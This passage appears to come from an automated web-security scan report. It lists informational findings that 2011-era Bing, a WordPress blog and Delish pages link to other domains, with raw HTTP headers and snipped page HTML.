x&#32;celebrities&#32;on&#32;a&#32;journey&#32;to&#32;discover&#32;their&#32;roots&#32;in&#32;the&#32;NBC&#32;reality&#32;series,&#32;&#34;Who&#32;Do&#32;You&#32;Think&#32;You&#32;Are&#63;&#34;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9bc269b0-2581-11df-a9a6-5a3963a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.414. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo?q=regis+philbin&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=339
Content-Length: 110386
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:05:41 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:01 GMT
Connection: close
Set-Cookie: _SS=SID=925EBC60E33D4C1CA70E8FAF877FB5F3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:01 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2afb2e20bb4741dd83bdc8cb94e3cae7; expires=Tue, 29-Jan-2013 17:00:01 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:01 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=e27771f6-4bd3-43c8-9abe-135a1940a718&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhos-the-one-guest-regis-could-never-get%2f6fzsvmo%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.accesshollywood.com&#47;" data-instName="InfoRelatedLinks">Access Hollywood</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;video.accesshollywood.com&#47;player&#47;&#63;id&#61;0" data-instName="InfoRelatedLinks">Access Hollywood Video</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.accesshollywood.com&#47;photos&#47;" data-instName="InfoRelatedLinks">Access Hollywood Photos</a>
...[SNIP]...
SN" class="motionThumb playerUrl"
title="Regis&#32;Philbin&#32;presents&#32;the&#32;&#34;Top&#32;Ten&#32;Reasons&#32;Regis&#32;Philbin&#32;Is&#32;Not&#32;On&#32;the&#32;Show&#32;Tonight.&#34;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;dd7af19d-774f-40f8-80a7-753b101261dc&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
NATPE&#32;Brandon&#32;Tartikoff&#32;Legacy&#32;Award&#32;in&#32;Miami&#32;on&#32;Tuesday&#32;where&#32;Mary&#32;presented&#32;Regis&#32;with&#32;an&#32;offer&#32;he&#32;couldn&#39;t&#32;refuse." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;180752e6-2929-11e0-80b2-7499c954006e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
Jan.&#32;18&#58;&#32;After&#32;over&#32;40&#32;years,&#32;Regis&#32;Philbin&#32;is&#32;retiring&#32;from&#32;his&#32;weekday&#32;talk&#32;show.&#32;NBC&#39;s&#32;Brian&#32;Williams&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2fe417d3-cdbc-4287-b4e1-1d5dd61261ab&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;Awards&#34;&#32;live&#32;from&#32;Las&#32;Vegas&#32;this&#32;Sunday.&#32;&#34;ET&#34;&#32;catches&#32;up&#32;with&#32;the&#32;him&#32;as&#32;he&#32;gets&#32;ready&#32;for&#32;the&#32;show." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;d0ff9b12-8007-11df-b6f8-246863a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&rel=MSN" class="motionThumb playerUrl"
title="ET&#32;is&#32;on&#32;the&#32;set&#32;of&#32;&#39;Who&#32;Wants&#32;To&#32;Be&#32;A&#32;Millionaire&#39;&#32;with&#32;host&#32;Regis&#32;Philbin." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;b43c7a30-8081-11de-8810-4a2d63a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ces&#32;his&#32;departure&#32;from&#32;&#34;LIVE&#33;&#32;with&#32;Regis&#32;and&#32;Kelly&#34;&#32;and&#32;&#34;My&#32;Strange&#32;Addiction&#34;&#32;features&#32;a&#32;couch-eating&#32;woman." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;b616d120-231e-11e0-af39-72a4c954006e&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;Regis&#32;really&#32;retiring&#63;&#32;&#32;Get&#32;a&#32;preview&#32;of&#32;Dave&#39;s&#32;conversation&#32;with&#32;Regis&#32;Philbin,&#32;tonight&#32;on&#32;the&#32;&#34;Late&#32;Show.&#34;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;f903c424-143f-49b8-bb63-d61757a06410&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
b028m1i?q=regis%20philbin&rel=MSN" class="motionThumb playerUrl"
title="Regis&#32;talks&#32;to&#32;ET&#32;about&#32;the&#32;loss&#32;of&#32;Michael&#32;Jackson&#32;and&#32;Farrah&#32;Fawcett." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9c1016cc-624c-11de-b2cf-b97863a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
philbin/pa3lzfyn?q=regis%20philbin&rel=MSN" class="motionThumb playerUrl"
title="Check&#32;out&#32;this&#32;How&#32;I&#32;Met&#32;Your&#32;Mother&#32;scene&#32;featuring&#32;Regis&#32;Philbin" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;b02dc69c-806c-4247-a58d-56fa504ecc08&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;Philbin&#32;delivered&#32;the&#32;news&#32;at&#32;the&#32;start&#32;of&#32;this&#32;morning&#39;s&#32;&#34;Live&#32;With&#32;Regis&#32;and&#32;Kelly.&#34;&#32;Msnbc&#39;s&#32;Chris&#32;Jansing" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a0277586-a2d4-4f0e-bf91-95696b01b3b2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.415. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dabagirls.com
Path:   /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.dabagirls.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 01:52:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">

<head
...[SNIP]...
<p>Powered by <a href="http://wordpress.org/">WordPress</a> and <a href="http://tarskitheme.com/">Tarski</a>
...[SNIP]...
</div><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

22.416. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001 HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 93291
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=504
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


<script language="javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- SHARE THIS SCRIPT DONT REMOVE -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script>
...[SNIP]...
<!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES -->
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
...[SNIP]...
<span class="msnlogo_top">
<a href="http://www.redacted">
<img src="/cm/delish/tmpl_images/header/msn_partner_slimline.png" title="go to redacted" alt="go to redacted" id="msnlogo" />
...[SNIP]...
<li class="c1">
<a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2">
<a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://movies.msn.com/">Movies</a>
...[SNIP]...
<li><a href="http://music.msn.com/">Music</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/superfans/">Superfans</a>
...[SNIP]...
<li><a href="http://tv.redacted/">TV</a>
...[SNIP]...
<li><a href="http://entertainment.redacted/video/">Video</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video ">Video</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/name/public/siteIndex">More</a>
...[SNIP]...
<li class="c4">
<a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx ">Video</a>
...[SNIP]...
<li class="c5">
<a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/video/ ">Video</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Your Home</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-life/ ">Your Life</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/">Your Look </a>
...[SNIP]...
<li class="c6 last">
<a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a>
...[SNIP]...
<li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a>
...[SNIP]...
<li><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li><a href="http://tech.redacted/">Tech &amp; Gadgets</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=DELISH">Bing</a>
...[SNIP]...
<li><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
